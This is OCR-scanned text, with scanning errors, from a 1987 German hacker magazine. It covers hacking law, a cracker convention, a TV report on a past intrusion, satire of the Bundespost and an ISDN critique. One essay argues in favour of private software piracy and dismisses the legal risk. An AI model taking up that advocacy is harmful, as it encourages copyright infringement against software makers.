gen zum 2. Wirtschaftskriniinalitätsgesetz fest, daß 
Hacken als solches nicht strafbar gemacht werden 
soll. 

Es fragt sich außerdem, ob man Personen bestrafen 
sollte, die der Gesellschaft mit ihrer angeblich so 
verwerflichen Tat einen Dienst erwiesen haben. 
Maßgeblich beeinflußt wird diese Frage natrlich 
dadurch, daß in vielen Fällen Fehler der Compu¬ 
terhersteller Ursache für Hacks sind. Soll man nun 
diejenigen bestrafen, die diese Fehler aufspürten, 
oder diejenigen, die sie verursachten? 

Hacker sind oft schwer zu begreifende Individuen, 
doch sollte das alle anderen dieser Weltengesell¬ 
schaft nicht dazu verleiten, sie zu verachten. Das 
würde bedeuten, daß man sich vor der Wahrheit 
versteckt. 

Asterix 

Zum Schluß ein Hinweis auf zwei Eücher: 

Steven Levy, “Hackers - Heroes Of The Computer 
Revolution", Anchor Press/DouDleday, Garden City, 
New York, 1984 

BMI Landreth, "Out Of The Inner Circle - A Hackers 
Guide To Computer Security", Microsoft Press, Was¬ 
hington, 1984 (auf Deutsch bei Goldmann) 

S)Afcii8d;lculicc 


Stop and Go 


'Bitte haben Sie Verständnis, wenn es zu Verzö¬ 
gerungen in der Bearbeitung kommt, wir haben 
auf Computer umgestellt.' 

Dieser Spruch kennzeichnet vielfach die Irrungen 
und Wirrungen, die sich bei der Einführung neuer 
Technologien ergeben. Besonders wirkungsvoll 
geht dabei wieder einmal die Post vor, die unlängst 
mehrere Laserdrucker erworben hat und versucht, 
mit den professionellen Geldinstituten Schritt zu 
hallen. Bei denen gibt es ja schon seit Jahren die 
scheckgrossen rot-gelben Formulare, mitdenen man 
fast alle Geldgeschäfte erledigen kann, ohne an seine 
Haiisbank gebunden zu sein. Beleggebundener 
Zahlungs-Verkehr nennt sich diese Buchungslechnik 
und ist ohne entsprechende Rechnerkapazität nicht 
zu bewältigen. 

Bei der Post versucht man es trotzdem. Und erzeugt 
so lange Schlangen vor den Schaltern und lange 
Gesichter bei den Schalterbeamten. Getreu dem al¬ 
ten Bundeswehrmotto 'Warum Maschinen einsel- 
zen, wenn man das auch mit Arbeitskraft hinkriegi’ 
wird aus dem BZV bei Postensein lisiengebundener 
Zahlungsverkehr, dessen höchster Automatisie¬ 
rungsgrad in der Verwendung eines Stempels be¬ 
steht. Und warum dieses? Nicht etwa, weil die neuen 
Formulare so hübsch bunt sind und den Rechen¬ 
zentren die Gelegenheit geben, die sündieueren La¬ 
serdrucker endlich zu benutzen (das Posthorn auf 
den Telefonrechnungen ist übrigens vom Design her 
völlig daneben), sondern weil in naher Zukunft 
EPOS kommt, der elektronische Postschalter, der ab 
1988 den ohnehin knappen Platz im Standard¬ 
schalter noch weiter verringert. 

Zwar gibt es noch keine entsprechend ausgebildeten 
Techniker, vom Bedienungspersonal ganz zu 
schweigen, aber immerhin, EPOS kommt. Und des¬ 
halb gibt es jetzt schon die neuen Formulare, die 
noch nicht mal die Selbstdurchschreibequalität ha¬ 
ben,dieman bei derBank seit Jahren kennt. Überdies 
ist es erheblich Zeit - und Energiesparender, stan der 
neuen Belege einen der guten alten blauen Zahl¬ 
scheine zu benutzen. Oder man greift gleich zur 
BTX-Kontenführung Und erspart sich und dem 
Schalterpostler eine Menge Stress... 


Hack’n’Crack 

2.CSS Summa Convention in Stuttgart. 


Im Wonnemonat Juli fand In Stuttgart wieder ein 
'Convention statt. Bekannte Cracker und Hac¬ 
ker aus Deutschland, der Schweiz, Frankreich 
und Bayern waren angereist. 

Zwi.schen Freitag und Sonntag fanden viele keinen 
Schlaf, da es neben dem Cracken und dem Erfah¬ 
rungsaustausch auch Harddisks (ST), Demos und 
einen Mega ST-2 zu bestaunen gab. (Der Mega ST 
konnte nichts, und selbst das nicht lOOprozentig.) 
Das babylonische Stimmengewirr wurde mittels der 
Sprachen Englisch und Assembler überwunden, bis 
zu dem Moment, in dem eine Sicherung etliche 
Ramdisksund einen Prozessor ins Nirwana schickte. 
Die Nacht war dem Hacken Vorbehalten. Besonders 
Delphi und eine Schweizer Pad mußten dran glau¬ 
ben. 

Auf dem Convention hat sich auch gezeigt, daß es 
einen selbst Hackern nicht immer bekannten (Hi 
Chaos) Unterschied zwischen Raubkopierem und 
Crackern gibt. 

Raubkopierer: 

- Null Originale 

- Wissen grade, wie man ein Copy bedient. 

- Verkaufen illegal Software 

Cracker: - Machen Programme 'handlicher' 

- Haben Dutzende von Originalen 

- Programmieren wie die Idioten 

- Hassen raubkopierer und die Pest. 

DAS ist ein riesiger Unterschied. Sollte vielleicht 
manchem zu denken gben. 

Terra 



goblln 

S>nlciiild(Iciibcr 







Hambulgel Hackel 


Japanisches Fernsehen zu Gast beim CCC 

Zwei Jahre „danach“ ist die japanische Öffent¬ 
lichkeit offenbar auf den damaligen (??? hebe) 
Hack in Tsukuba aufmerksam geworden. 

Die japanische Fernsehgesellschaft „NHK“ ent¬ 
sandte daher ein mit Ausdrucken von Phineas- 
Protokollen bewaffnetes Fernsehteam, um die be¬ 
treffenden deutschen Hacker zu befragen und ihnen 
ein wenig auf die Finger zu schauen. Man traf sich 
bei Steve und beantwortete ersteinmal einige all¬ 
gemeine Fragen zur Tätigkeit und Motivation der 
CCCTer sowie einige Einzelheiten des Tsukuba- 
Zugangs aus Hamburg. Ich grüßte per TV unseren 
alten Freund Youhei Morita (Network Manager des 
KEK), der uns damals freundlicherweise privile¬ 
gierte accounts eingerichtet hatte. Natürlich konnte 
(und wollte?) man nach so langer Zeit nicht alle 
Einzelheiten des damaligen Hacks zum Besten ge¬ 
ben. Stattdessen einigten wir uns, am Beispiel Auto- 
hacking den japanischen Zuschauern, besonders de¬ 
nen unter 18 Jahren, einmal zu demonstrieren, wie 
wenig technische Infrastruktur als Eintrittskarte für 
das Globale Dorf notwendig ist. Wir sattelten also 
die Pferdchen und kämpften uns durch den frühen 
Feierabendverkchr bis zur Außcnalster vor, um den 
Japanern noch etwas Hamburg als Gratisbeilage mit¬ 
zugeben. Vor einer Datentankstelle Auf dem Rand¬ 
grün hielten wir zum Aufbau derTV-Gerätschaften. 


Das Drehbuch hatten wir uns spontan unterwegs 
ausgedacht'. Eleganter Sportwagen mit In¬ 
halt (2 Hacker, ein MultiSpeed und ein Schlabber¬ 
phon) nähern sich, über den staubigen Fußweg ent¬ 
lang der Alster gleitend.der gelben DTankstelle. Ein 
Hacker steigt aus, das lange Serialkabel langsam 
abwickelnd, und befestigt das Schlabberphon am 
Schnorchel zur grossen weilen Welt. Zwanzig Pfen¬ 
nige klimpern leise in den Münzer, dazu Rockmusik 
aus dem Auto. Der zweite Hacker verharrt vor sei¬ 
nem japanischen Laptop und reizt Datex an... - 
Abtanz. 


Mit der Verbindung klappte es nicht ganz, da die 
Konfigurati on (mit freundlicher Unterstützung von 
auf die Schnelle zusammengestellt 
worden war. Das jedoch war den Japanern nicht so 
wichtig, denn daß es funktioniert, glaubten sie uns 
auch so. Viel wichtiger schien ihnen, das Material so 
schnell wie möglich nach Japan zu bekommen. Viel¬ 
leicht, damit ihnen keiner die Story abjagen kann 
(nach 2 Jahren !!). Als wir schon mit dem Abbau 
begonnen hatten, ließ ich mich mich dazu hinreissen, 
meinen Koffer vor der Kamera auszupacken. Der 
Kameramann zeigte sich entzückt, besonders vom 
Gaslötkolben und der eingepaßten 20 MB Festplatte. 

VIc. 


CLlNCH/DS-RED/vrC/28.08.87/00:51/2679Z. 



16 


Snfcndiljlcttiicr 


COMMUNITY COMPUTING ’87 


Report now available 

If you were at Community Computing ’87 in 
January, you’ll want a copy of the report, fo 
remind you of all those names, ideas, wonderful 
times, awfui kitchen staff and what it was like Ihe 
Weekend before Britain ground toa halt in snow- 
drifls. If you weren’t therc you’ll need a copy to 
realise just how much you inissed. 

To remind you - it includes Items on: 

- access to Computers for disabied people 

- access to training 

- funding Computer projects 

- women & new technology 

Copies of the report are available from: 

Joy Bryant 

Community Computing in Newcastle 
2nd floor, Low Friar House 
36-42 Low Friar St 
Newcastle upon Tyne NEl 5UE 

Send 1.50 per copy (inc postage) with your order. 
Cheques should be madc payablc to COMMUNITY 
COMPUTING NETWORK Please pass this mes- 
sage on to your friends, colleagues, anyone. 

CCN Regional Reps on Oeonet (Aug 87); 

LYNDA.GARFIELD South Wales 

SUNNYHILL Cumbria 

CCIN North East AND general enquiries 

R.HASELGROVE West Yorks 

JULIAN.TODD West Country 

PETEROWAN Kent & E. Sussex ANDmembership 

applicaiions 

LITRU London 

For other CCN members use the Geonet command 
LIST CCN-ML 

COMPOSTtSERVER 5-Aug-87 15:27 
CLINCHlALLGEMEINES/HHNET/05.08.87 






17 





Das Wlutantenkorps der Post 

Wird Uri Geller naechster Postminister? 


Während Parapsychologen in aller Welt sich ver¬ 
zweifelt bemühen, den wissenschaftlichen Nach¬ 
weis der Existenz übersinnlicher Phänomene wie 
Telekinese, Telepathie, Telefonieren und der¬ 
gleichen zu erbringen, ist die Deutsche Bundes¬ 
post mal wieder einen Schritt weiter. 


Humor 


SI5UWD 

HUM0RR5PAKTeUR-i 
PASS ICH MICHT 
LACHCi: 


fördert Kreativität und Produktivität 


FERNWTRKEN heißt das Stichwort, mit dem die 
Post in den Bereich des Übersinnlichen vorstoßen 
. will. Im kurzen Amtsenglisch: TEMEX. Derzeit gibt 
es noch erhebliche Schwierigkeiten, eine genügende 
Zahl geeigneter Medien zu verbeamten, daher setzt 
man amtlicherseits auf Altbewährtes, nämlich die 
Mikroprozessortechnik. 

Wo früher ein simples Relais ausreichte, um einen 
Einbruch zu melden und die Ordnungshüter in 
Marsch zu setzen, waltet heute der Computer und 
simuliert für nur noch DM 8.50 je Monat (Preisfrage: 
Woher kennen wir diesen Betrag?) einen schlichten 
Schaltkontakt, der dem gestressten Yuppie am 
Strand der Costa Quanta beispielsweise mitteilt, daß 
das heimische Aquarium seinen Inhalt in die dar¬ 
unterliegenden Wohnungen entleert hat. Zu allem 
Überdrußdarf sowas nureinmal im Monatpassieren. 
Neigt das Aquarium zu periodischer Leckage, wird 
es automatisch teurer. Der technisch versierte Leser 
wird sich zu Recht fragen, warum ein Ereignis, das 
technisch gesehen dem Abheben des Telefonhörers 
entspricht, plötzlich so teuer wird. Der Grund dafür 
liegt wohl im geplanten Ersatz der störanfaelligen 
Technik durch medial begabte Postler, deren Ar¬ 
beitsplatz finanziert sein will. 

Eine weitere Ausbaustufe von TEMEX sieht unter 
anderem die Fernablesung von Messgeräten vor. Die 
hiesigen Wasserwerke erwägen bereits ernsthaft, 
Gebrauch davon zu machen, um endlich litergenau 
festsiellen zu können, wann die Pause des Länder¬ 
spiels begonnen hat. Unter Zurückstellung erhebli¬ 
cher datenschutzmäßiger Bedenken entsteht hier 
durch die Fernablesung der Wasseruhren eine Al¬ 
ternative zum TED, der den neuen Medien - im 
wahrsten Sinne des Wones - nicht mehr das Wasser 
reichen kann. 

goblin 

postmu22.dS 220787 2047 

18 


Hamburg (clinch) - Spaß und Humor steigert die 
Kreativität, sagt die Psychologin Dr. Alice M. 
Isen von der University of Maryland in Balti¬ 
more. So konnte sie feststellen, daß die Kreati¬ 
vität von Versuchspersonen deutlich höher war, 
wenn sie gerade einen lustigen Film gesehen hat¬ 
ten. Sie lösten dann zum Beispiel deutlich schnel¬ 
ler das Problem, eine Kerze mittels Heftzwecken 
so an einer Korkwand zu fixieren, daß sie nicht 
tropft - indem sie kurzerhand die Schachtel für 
die Zwecken an die Wand hefteten und als Ker¬ 
zenhalter entfremdeten. “Unerfreute“ Zeitge¬ 
nossen waren dagegen meist Opfer einer “funk¬ 
tionalen Fixiertheit“, das heißt, sie tendierten 
dazu, die vorgelegten Objekte nur ihrer üblichen 
Bestimmung gemäß zu verwenden. 

Der Psychologe Davin Abramis von der California 
State University in Long Beach stellte laut New 
York Times bei der Untersuchung von 382 Personen 
fest, daß jene am erfolgreichsten waren und mit ihren 
Kollegen am besten auskamen, die in ihrer Arbeit 
auch Spaß sahen. Eine wichtige Quelle hierfür war 
das Scherzen mit Kollegen. 

Daß Humor Kindern das Lernen erleichtert, stellt Dr. 
Dolf Zillman im Handbook of Humor Research 
(Springer Verlag) fest. Er warnt allerdings vor Iro¬ 
nie, die junge Kinder meist nicht verstehen und 
empfiehlt, möglichst über Dinge zu witzeln, die 
nicht gerade Lemgegenstand sind. Bei Jugendlichen 
und Studenten hingegen kommen bezugsfremde 
Scherze eher schlecht an. Generell kommt dem ge¬ 
meinsamen Lachen eine wichtige soziale Funktion 
zu, indem es einen unausgesprochenen Konsens sig¬ 
nalisiert, insbesondere bei “heiklen" Themen. 


Aus DIE ZEIT Nr.36, 28. August 1987 

jwi 060506 Sep 87 BEREICH CLINCH HUMOR 
CLINCH/ALLGEMEINES/UGE/07.09.87/05:11/1703 Z. 

£>nleii$d)Icuiicr 


■ lJUCHriR 


(1) EARN Remingway 

Wem die BELL-Norm schlägt 

(2) Karl May 

Der Satz im Siibensee 

Einführung in die unstrukturierte Textverarbeitung 

(3) Karl Juni 
Winneone 

(4) Karl Juli 
Winnelwo 

(5) Marcel Plus 

Auf der Suche nach dem verlorenen Byte 


(6) W. Irrsinn 

Zen oder die Kunst, undokumentierten Code zu 
warten 

(7) Charles Bugkowski 

Gedichte, die einer schrieb, bevor er seinen Edi¬ 
tor aus dem zehnten Stockwerk warf 

(8) Tracy Kleinbahn 

Die Seele einer neuen Schiene 

(9) Harun Digit Al Rashid 

Ali Caga und die vierzig Zeichen 
Volksmärchen 

(10) Raymond Händler 

Der lange Code zum kurzen Absturz 

SntenSd)Icubcr 


(11) Jack Tramtel (Hrsg.) 

Der Untergang des ROM 

(12) Agatha Christie 
Reset am Nil 

(13) Astrid Linkdröhn 
Pippi Langwort 

(14) Christian Manmußdasmal Anderssehn 
Peterchens Druckeranpassung 

(15) Johann Vorgang von Güte 
Die Leiden des jungen Konverter 

(16) Hermann Hesse 
Das Magnetblasenspiel 

(17) Euripides 
Ariadne auf Nixdorf 

(18) William Scheckspeare 

King Clear 

(19) Ready Miller 
Stille Tage in CLINCH 

(20) Marquis de Start 
Quälcode 

(21) Ladislaus Freiherr von Software-Masoch 
Wie ich lernte, Public-Domain-Programme zu 
lieben 

(22) Kerningham/Ritchie 

Prinibad der C-Fahrer 

(23) lan Lemming 
For your AI only 




19 












Raubkopieren 


Vorweg: die ganze Diskussion um die Raubko¬ 
piererei ist im Grunde ohnehin sinnlos, denn 
kopiert wird ohnehin - egal, wie gut die Argu¬ 
mente der Kopiergegner auch sein mögen. 

Dennoch - damit empfindsame Gemüter keine Ge¬ 
wissensbisse kriegen - hier einige wie ich finde 
schlagende Argumente für die sog. “Raub“kopie- 
rerei: 

In der Praxis sieht es in der Regel so aus, daß 
Mikrocomputersoftwaie von kommerziellen An¬ 
wendern häufig gekauft wird, private Anwender 
dagegen lieber auf preisgünstigere Raubkopien zu¬ 
rückgreifen. Daraus zu folgern, kommerzielle An¬ 
wender seien in irgendeiner Form den privaten Ko¬ 
pierern moralisch überlegen, ist Unsinn. Kommer¬ 
zielle Anwender kaufen eher, weil 

a) bei ihnen die Gefahr der Entdeckung grösser ist als 
bei privaten (Kundenverkehr, ärgerliche Mitarbeiter 
u.ä.) 

b) weil kommerziellen Anwendern oft die erfor¬ 
derlichen Verbindungen zur Kopiererszene fehlen 
und das Aufbauen dieser Verbindungen oft teurer 
und riskanter ist, als die Software zu kaufen 

c) kommerzielle Anwender mehr als private auf den 
Support der Software angewiesen sind und 

d) weil, wenigstens in einigen Bereichen, die Pro¬ 
duktivitätssteigerung durch Software so immens ist, 
daß die Anschaffungskosten verglichen damit lä¬ 
cherlich gering erscheinen 

e) weil in einigen Bereichen EDV-lnvestitionen so¬ 
gar noch stärker als andere Investitionen steuer- 
mindemd wirken. 

Wie man sieht, fünf gute Gründe für den kommer¬ 
ziellen Anwender, Software zu kaufen. Alle diese 
Gründe fallen für die privaten Anwender, also für 
Dich und mich, weg. Und - Du und ich kaufen jaauch 
so gut wie nie Software, oder? Im Grunde ist doch der 
Softwaremarkt eine sehr soziale Veranstaltung: Fi¬ 
nanzkräftige Käufer kaufen die Software, finanzie¬ 
ren somit die Entwicklungskosten, finanzschwache 
private Anwender ziehen sich eben Kopien. Eigen- 
lich sollten alle zufrieden sein. 

28 


Die Gegner der “Raubkopiererei“ (hauptsächlich 
Softwarefirmen, komisch, nicht war?) haben sich 
dennoch einige Argumente gegen diese Form des 
Vertriebes ausgedacht. Sie sind es wert, einmal unter 
die Lupe genommen zu werden. 

Eines der wichtigsten lautet: Kopieren fügt den Fir¬ 
men erheblichen finanziellen Schaden zu, jede un¬ 
autorisierte Kopie ist ein Verdienstausfall für die 
Herstellerfirma. 



Diese Argument ist nicht ganz von der Hand zu 
weisen. Allerdings gilt es nur in stark abge¬ 
schwächter Form. Bsp.: ein entfernter Bekannter 
von mir hat sich kürzlich für seinen privaten Bedarf 
ein Statistikprogramm beschafft - natürlich kosten¬ 
los. Dieses Programm hätte ihn, legal gekauft, läp¬ 
pische 18.000 DM gekostet. Es ist natürlich Unsinn 
anzunehmen, er hätte es für diesen Preis gekauft. 

Außerdem: was interessiert mich als Anwender die 
Ertragslage einer Softwarefirma? Eine Softwarefir¬ 
ma ist kein Wohlfahrtsveiein. Sie will Geld ver¬ 
dienen. Ich will kein Geld ausgeben. So what? 

Ein weiteres Argument der Gegner; Kopieren macht 
die Software teuerer. Nochmal: was interessien 
mich, wie teuer Software ist? Ich kaufe sowieso 
keine. Von niedrigeren Preisen profitieren also oh¬ 
nehin nur kommerzielle Anwender- und für die sind 
die Kosten für Software im Vergleich mit dem Pro¬ 
duktivitätszuwachs wie gesagt meist vemachläs- 
sigbar. 

SnlciiSiliIciihtr 


Ein besonders herzzerreißendes Argument - fast ein 
Wunder aus dem Mund der sonst gar nicht so so¬ 
zialen Softwareindustrie - lautet: Die Einbußen, die 
durch Kopiercrei entstehen, gehen zu Lasten der 
armen, angestellten Programmierer, die um die 
Früchte ihrer harten Arbeit gebracht werden. Un¬ 
sinn. Erstens; Ein Unternehmen, das angestellte Pro¬ 
grammierer in Abhängigkeit von verkauften Stück¬ 
zahlen bezahlt, wälzt das unternehmerische Risiko 
(daß das Unternehmen als Rechtfertigung für seine 
Gewinne benutzt) auf abhängig Beschäftigte ab. Das 
ist ungerechtfertigt. Ein Programmierer kann sich 
nicht leisten, von Lust und Laune des Marktes ab¬ 
hängig zu sein, wenn es um sein Einkommen geht. 
Schließlich ist er abhängig beschäftigt, nicht etwa 
Unternehmer. Das viele Unternehmen es dennoch 
schaffen, Programmierer zu derartigen Konditionen 
zu beschäftigen, liegt teilweise auch am Desinte¬ 
resse derselben an ihren eigenen Rechten. Ich kenne 
jedenfalls genügend Programmierer, die sich alles 
gefallen lassen, wenn es nur ein paar Mark gibt und 
sie ordentlich daddeln dürfen. 

Und selbst wenn ein Programmierer in Abhängigkeit 
von Stückzahlen bezahlt wird, schadet ihm Kopie¬ 
rerei nur unter der unbewiesenen Annahmen, daß 
diese die Erträge schmälert. Und noch etwas: Trotz 
allem Geschrei geht es den meisten Softwarefinnen 
gelinde gesagt sehr gut. Kaum eine andere Branche 
hat ähnliche Zuwachsraten zu verzeichnen. Unterm 
Strich profitiert die Mikrocompuierindustrie sogar 
von der Kopiererei. Dazu ein paar Beispiele; 

Der immense Erfolg des C-6d wäre ohne eine gut 
funktionierende Infrastruktur, die auch den letzten 
Anwender mit kostenloser Software versorgt, nicht 
denkbar gewesen. Es ist bekannt, daß bei der Ent- 
wicklungs des C-64 eine Maxime war, auf dieser 
Maschine einen effektiven Kopierschutz schon von 
derArchitekturderHardware unmöglich zu machen. 
Commodore will schießlich Hardware verkaufen, 
und nichts wirbt besser für einen Computer als ko¬ 
stenlose, leicht erhältliche Sofware. 

Nächstes Beispiel: die Diskettenhersteller. Wie sä¬ 
hen deren Umsätze ohne das segensreiche Tun der 
Kopierszene aus? Oder; Verlage. Wer kennt nicht 
die berühmte Buchreihe “Das Buch zu ihrer Raub¬ 
kopie“, die mittlerweile fast jeder im Mikrocom¬ 
puterbereich tätige Verlag im Programm hat. Es ist 
kein Geheimnis, daß z.B. Data Becker, einer der 
militantesten Gegner der Raubkopiererei, von ein¬ 
igen Buchtiteln mehr verkauft hat, als von dem 
dazugehörigen Programm. 

Snlcnärijfciiticr 


Weiter: Kopien machen ein Programm bekannt. Die 
Wirtschaft verlangt nach Kräften mit EDV- 
Erfahrung. Wenn sie junge Leute mit Computer- 
Erfahrung einslellen: womit haben die ihre Erfah¬ 
rungen gesammelt? Mit gekaufter Software? Wohl 
nur selten. “Raub“kopien können sogardie Umsätze 
von Softwarefirmen steigern. Angenommen, ich ha¬ 
be zu Hause ca. 7 verschiedene Textprogramme 
rumfliegen - alle natürlich selbst kopiert- und arbeite 
nun vorzugsweise mit, sagen wir, MS WORD. Ich 
werde nun von einer Firma eingestellt und ent¬ 
scheide mit über die Anschaffung eines Satzes von 
Textprogrammen. Für welches werde ich mich auss- 
sprechen? Erraten! 

Natürlich gibt es bei der Kopierei juristische Pro¬ 
bleme. Nur; wen interessieren die? Wer sich nicht 
erwischen lässt, hat nichts zu befürchten. Die Fälle, 
in denen private Kopierer, die nicht mit geklauter 
Software gehandelt haben (was ich übrigens ableh- 
nc) kann mensch an den Fingern einer Hand ab- 
zählen. 

Also alles in Ordnung? Fast. Der Kopierer hat leider 



immer noch oft das Problem, an Dokumentation 
heranzukommen. Oft rennt er zum Kopierladen oder 
kauft Bücher aus der oben erwähnten Buchreihe. 
Warum findet sich nicht mal jemand, der zu be¬ 
kannter Standardsoflware Dokumentation auf Dis¬ 
ketten vertreibt, die einfach mit der Software zu¬ 
sammen kopiert werden kann? Technisch ist das 
doch überhaupt kein Problem. Hier muß ncxih ein¬ 
iges passieren. Mich interessiert auch, wie andere 
über dieses Thema denken: Beiträge erwünscht. 

Caesar/Stoepsel 

CUNCH/DS-RED/CAESAR/02.10.87/19:54/7438Z. 

21 









Goldenes Kalb 


Zurrr Querfunkratschlag in Berlin 


Der folgendeText ist eine Kritik zu einem Beitrag 
für die Veranstaltung “Informationsgesellschaft 
- das goldene Kalb der POST-Moderne“ am 
Sonntag, 6.9.87 neben der Funkausstellung. Der 
Beitragselberliegt nur in gedruckter Form vor, 
unsere Kritik ist aber auch aus sich selbst heraus 
verständlich. 

ZuB.l.b) 

Die “Verheimarbeitung“ der Arbeitnehmerschaft 
wird nicht durch die Verhinderung einer Einführung 
neuer Kommunikationstechniken erschwertfun- 
möglich gemacht. Im Gegenteil: Mit der existenten 
Technik kann der Anteil der Kommunikationsko¬ 
sten an den Heimarbeitsplätzen ohne Schwierig¬ 
keiten “aus der Portokasse“ bezahlt werden und wird 
durch ISDN voraussichtlich nur teurer. 

Die Schwierigkeiten liegen in den Bereichen der 
Organisation und MitarbeiterfUhrung, bzw. bei den 
heutigen Unternehmensstrukturen sind “Heimar¬ 
beitsbüros“ meist zu teuer und insbesondere gelingt 
es noch nicht, durch die Netze ein ähnlich dichtes 
Geflecht von Informationsdynamik (Klatsch!) zu 
schleusen, wie in einer Bürogebäudesituation mit 
gemeinsamer Kantine - und das wird nach unseren 
Kommunikationserfahrungen in den Netzen glück¬ 
licherweise auch nie möglich sein. Es stellt sich 
nämlich heraus, daß die Medienspezifik der digita¬ 
len Kommunikationstechnologie weitgehend uner¬ 
forscht ist und hier auf Kapitalseite erheblich über¬ 
zogene Erwanungen bestehen, die sich auf Kriti¬ 
kerseite in erheblich überzogenen Befürchtungen 
spiegeln. Siehe hierzu; “Telehcimarbeit ist kein Ren¬ 
ner“ in “Die Angestellten“ der DAG vom 7.8.87. 



Das Argument, daß durch die digitale Verheimar- 
beitung die gewerkschaftliche Organisation ge¬ 
schwächt wird, stimmt nur teilweise. Klassische 
Heimarbeitsplätze - mit der bekannten fast- 
Unmöglichkeit gewerkschaftlicher Organisation - 
zeichnen sich dadurch aus, daß die Heimarbeiter nur 
durch persönliches Erscheinen an der Haustür er¬ 
reichbar waren. Dies ist nun aber - durch das Netz- 



nicht mehr der Fall und macht ironischerweise ge¬ 
werkschaftliche Organisation einfacher als früher. 
Statt sich zum Abliefem eingegebener Texte in den 
Rechnendes Arbeitgebers “einzuloggen“, kann sich 
der Heimarbeiter genausogut in eine Mailbox seiner 
Gewerkschaftsgruppe einwählen. Damit wollen wir 
nicht sagen, daß dadurch gewerkschaftliche Orga¬ 
nisation besser/einfacher wird, die Situation ist je¬ 
doch nicht so hoffnungslos, wie das oft dargestellt 
wird. Es ändern sich halt - technologiespezifisch - 
gewerkschaftliche Organisationsformen genauso, 
wie sich auch die Produktionsformen verändern. 
Bewußtseinsmäßig ist hier nur dieKapitalseitc in der 
Problemerkennung wesentlich weiter. 

Erfahrungen in England zeigen übrigens, daß re¬ 
gionale Vorortzentren für Verwaltungstätigkeilen 
entstehen, die von mehreren Firmen gemeinsam be¬ 
trieben und unterhalten werden und in letzter Kon¬ 
sequenz zum “mietbaren“ Büro führen, wie dies vor 
ca. einem halben Jahr vom SPIEGEL aus Hamburg 
berichtet wurde. 

Zu B.l.c) 

Wiederum der gleiche Denkfehler der Autoren. Um 
alle die prognostizierten Entwicklungen im Dienst¬ 
leistungsbereich eintreten zu lassen, braucht es kein 
ISDN, das geht VON DER TECHNIK her bereits 
heute über Telefonleitungen. Was fehlt, sind die 
“Programme“, das Know-How, wie sich solche 
Dienstleistungen maschinisieren lassen. Es sind die 
“Hacker“, die sich dieses Wissen heute spielerisch 
aneignen, mag es ihnen auch nicht bewußt sein. Und 
schon bald werden einige dieser Zunft ihre Erfah- 
mngen verkaufen. Außerdem sollte man in Betracht 
ziehen, daß auch “den Kapitalisten" inzwischen 
deutlich wird (wofür sind schließlich die Horden von 
Psychologen nach ’69 ausgebildet worden...),daß es 
so etwas wie “Psychoarbeit“ gibt - Stichwort: Ver- 
kaufsfbrdemde Maßnahmen, “human touch“ (siel). 

Anzumerken ist, daß ein Dienst wie BTX, der eine 
deutliche Trennung zwischen Anbieter und Kon¬ 
sument macht, für den Konsumentenextremim Preis 
heruntersubventioniert wird, während ein Dienst 
wie DATEX-P, der insbesondere für die interna¬ 
tionale Vernetzung von Einzelnen und Gruppen gro¬ 
ße Bedeutung hat (zB. PeaceNet in den USA bzw. 
GreenNet in GB), im Vergleich zu anderen Ländern 
sehr teuer ist. Damit pflegt die BP über ihre Ge¬ 
bührenpolitik den Provinzialismus. 

SiilcnSd)Iciibcc 


ZuB.2 

Hier kommen die Autoren uE. endlich an den Kern 
der ISDN-Problematik. Die Mißbrauchsgefahren, 
die in dieser zentralisierten “eierlegenden Kommu¬ 
nikationsmilchsau“ liegen, lassen die Herzen von 
Pinochet über Jamselzki bis George Bush schneller 
schlagen. So, wie ISDN heute durch die CCli'l 
standardisiert ist, wird es keine anonymen Anrufe 
mehr geben. In der Beziehung ist auf der politischen 
Ebene bisher kein Problembewußtsein entwickelt 
und die Techniker argumentieren Morgenstemmä- 
ßig; Es kann nicht sein, was nicht sein darf. Für die 
Ablehnung von ISDN finden sich sogar Bundesge¬ 
nossen in der Mailboxindustrie, zumindest beim 
politisch bewußten Teil derselben. Noch einmal; aus 
technischen Gründen ist ISDN nicht notwendig. Die 
einzige Rechtfertigung dafür liegt in den Kapital- 
verwertungs/Neuinvestitionszwängen der Elektro¬ 
nikindustrie. 

Zu B.2.b) 

Zum Abspeichern der Gespräche: Dies ist digital zu 
teuer, da durch die Digitalisierung das zu spei¬ 
chernde Datenvolumen gegenüber analogem 
Dampftonband zu stark aufgebläht wird. Gefährlich 
ist in dem Zusammenhang jedoch, daß die Digita¬ 
lisierung aller Signale einen Schritt näher an auto¬ 
matisierte “Reizworterkennungsautomaten“ führt, 
die dann - in einer Hierarchie steigender “Wichtig¬ 
keit“ - automatisch bestimmte Gespräche zur Auf¬ 
zeichnung ausdem Telefonverkehr “herausfischen“. 
Aberauchdasist nichtsNeues und wird heute bereits 
praktiziert. Einfacher wird durch ISDN das Mithö¬ 
ren, Mitschneiden und Analysieren von Textkom¬ 
munikation (zB. TEXTOR Programmpakei des 
BKA). Einziger Schutz - und das wird auch aus 
industriellen Interessen intensiv entwickelt - ist die 
Verschlüsselung aller Daten, die über irgendeine 
Leitung gesendet werden. 



Folgendes ist wichtig zu wissen: Nach Tschernobyl 
wurde kein Katastrophenalarm ausgelöst, so daß 
potentiell noch alle Telefone funktionierten und 
nicht nur die rot markierten für den Krisenfall. In 
ganzen Regionen brach deshalb der Telefonverkehr 
wegen Überlastung zusammen, so daß das Telefon¬ 
netz nicht mehr zum Krisenmanagement taugte. 
Daraufhin ist auf Kabinettsebene beschlossen wor¬ 
den, in Zukunft das eigentlich veraltete, digital ge¬ 
schaltete DATEX-L Netz als Notstandsnetz wei- 

Soicnä(f)lciii)cr 


terhin - parallel zu ISDN - auszubauen. An die,sem 

Netz wird TELETEX als eine Art modernes TELEX 
be trieben.FürsolcheSituationenistDENGRÜNEN 
in Bonn eine partielle Teilnahme an PARLAKOM 
zu empfehlen, da im Rahmen von PARLAKOM 
geplant ist, die Heimatwahlkreise der Abgeordneten 
via TELETEX mit dem jeweiligen Abgeordneten¬ 
büro in Bonn auf Kosten der Steuerzahler zu ver¬ 
binden. Damit wäre dann im Katastrophenfall eine 
eigenständige Informationsmöglichkeit “von der 
Basis“ins “Raumschiff Bonn“ gegeben. (Siehe dazu 
auch: 'STUDIE’ für den geplanten Computereinsatz 
der Fraktion DIE GRüNEN im Auftrag des Deut¬ 
schen Bundestages, Verlag Der Grüne Zweig, Nr. 
117) 

Ein Vergleich mit der Plutonium wirtschaft geht fun¬ 
damental am Wesen der Rechnervemetzung vorbei. 
Eine Plutoniumwirtschaft ist extrem schutzbedürf¬ 
tig auf Grund eines materiellen “Plutoniumhau¬ 
fens“, der physikalisch an genau umgrenzter Stelle 
vorhanden ist und damit mögliches Ziel terroristi¬ 
